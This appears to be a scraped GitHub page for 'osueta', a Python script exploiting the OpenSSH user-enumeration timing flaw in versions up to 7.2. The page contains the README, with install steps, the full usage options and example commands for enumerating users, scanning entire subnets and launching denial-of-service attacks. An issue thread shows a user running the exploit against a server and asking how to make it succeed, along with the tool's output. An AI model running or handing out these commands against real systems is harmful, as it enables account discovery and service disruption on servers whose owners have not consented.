    ***************************************************************************
    *                  ___                 ___ ___ _  _                       *
    *                 / _ \ _ __  ___ _ _ / __/ __| || |                      *
    *                | (_) | '_ \/ -_) ' \\__ \__ \ __ |                      *
    *                 \___/| .__/\___|_||_|___/___/_||_|                      *
    *                      |_|                                                *
    *   _   _               ___                             _   _             *
    *  | | | |___ ___ _ _  | __|_ _ _  _ _ __  ___ _ _ __ _| |_(_)___ _ _     *
    *  | |_| (_-</ -_) '_| | _|| ' \ || | '  \/ -_) '_/ _` |  _| / _ \ ' \    *
    *   \___//__/\___|_|   |___|_||_\_,_|_|_|_\___|_| \__,_|\__|_\___/_||_|   *
    *                                                                         *
    *          _____ _       _               _  _   _           _             *
    *         |_   _(_)_ __ (_)_ _  __ _    /_\| |_| |_ __ _ __| |__          *
    *           | | | | '  \| | ' \/ _` |  / _ \  _|  _/ _` / _| / /          *
    *           |_| |_|_|_|_|_|_||_\__, | /_/ \_\__|\__\__,_\__|_\_\          *
    *                              |___/                                      *
    ***************************************************************************

What's OSUETA?

    Osueta it's a simple Python2 script to exploit the OpenSSH User Enumeration Timing Attack, 
    present in OpenSSH versions <= 7.2 and >= 5.* . The script has the ability to make variations
    of the username employed in the bruteforce attack, and the possibility to establish
    a DOS condition in the OpenSSH server. 

    http://seclists.org/fulldisclosure/2013/Jul/88 
    
	The bug was corrected in OpenSSH version 7.3:
	http://www.openssh.com/txt/release-7.3

Authors:

    c0r3dump3d | coredump<@>autistici.org
    rofen | rofen<@>gmx.de

We want to give the thanks to Javier Nieto from www.behindthefirewalls.com for his support and help.

Advice:

Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Dependencies:

Debian:

# apt-get install python-ipy python-nmap 
# pip install paramiko
# pip install IPy

ArchLinux:

# pacman -S python2-ipy python2-nmap python2-paramiko

Installing:

    $ git clone https://github.com/c0r3dump3d/osueta.git

Usage:

usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
             [-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH]
             [-c VERS] [--dos DOS] [-t THREADS]

OpenSSH User Enumeration Time-Based Attack Python script

optional arguments:
-h, --help  show this help message and exit
-H HOST     Host Ip or CIDR netblock.
-k HFILE    Host list in a file.
-f FQDN     FQDN to attack.
-p PORT     Host port.
-L UFILE    Username list file.
-U USER     Only use a single username.
-d DELAY    Time delay fixed in seconds. If not, delay time is calculated.
-v VARI     Make variations of the username (default yes).
-o OUTP     Output file with positive results.
-l LENGTH   Length of the password in characters (x1000) (default 40).
-c VERS     Check or not the OpenSSH version (default yes).
--dos DOS   Try to make a DOS attack (default no).
-t THREADS  Threads for the DOS attack (default 5).

Example:

* A single user enumeration attempt with username variations:

        ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes

* A single user enumeration attempt with no user variations a dos attack:

        ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes

* Scanning a C class network with only one user:

	./osueta -H 192.168.1.0/24 -p 22 -U root -v no 

* Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:

	./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50

Four instances need to successfully exploit the server?

Hi there,
first of all, thanks for the exploit!

I have an issue with the current version of the exploit.
The server has openssh-6.0p1 installed.

If I run just one instance with the following command, it does not work.

./osueta.py -H 192.168.0.9 -p 22 -U user -d 30 -v no --dos yes -t 60

[+] Trying to detect the banner of SSH server at tcp port 22 for host 192.168.0.9 ...
[++] SSH Server Banner ==> OpenSSH 6.0


[+] Connecting [email protected]:22 ... 
[-] Authentication failed.
[-] No user(s) found.
No user found. Imposible to establish a DOS condition.

The user exists on the system but the exploit does not find him.
However, if I run 4 instances of the exploit, every instance shows the user and the exploit is successful.

[+] Trying to detect the banner of SSH server at tcp port 22 for host 192.168.0.9 ...
[++] SSH Server Banner ==> OpenSSH 6.0


[+] Connecting [email protected]:22 ... 
[-] Authentication failed.
[+] User: user exists

Server version: OpenSSH 6.0

Users found      Time delay in seconds
--------------------------------------
user                      48

Trying to establish a DOS condition with user user and 5 threads ...
If you see some error message probably the attack has succeeded. Press [Ctrl-Z] to stop.
No handlers could be found for logger "paramiko.transport"

I can not run just one instance and exploit the server successful. I have also tried to run a different number of threads (up to 60), with no different results. How can I exploit the server with just one instance of the exploit running?

c0r3dump3d / osueta Goto Github PK

osueta's Introduction

What's OSUETA?

Authors:

Advice:

Dependencies:

Installing:

Usage:

Example:

osueta's People

Contributors

Stargazers

Watchers

Forkers

osueta's Issues

Recommend Projects

Recommend Topics

Recommend Org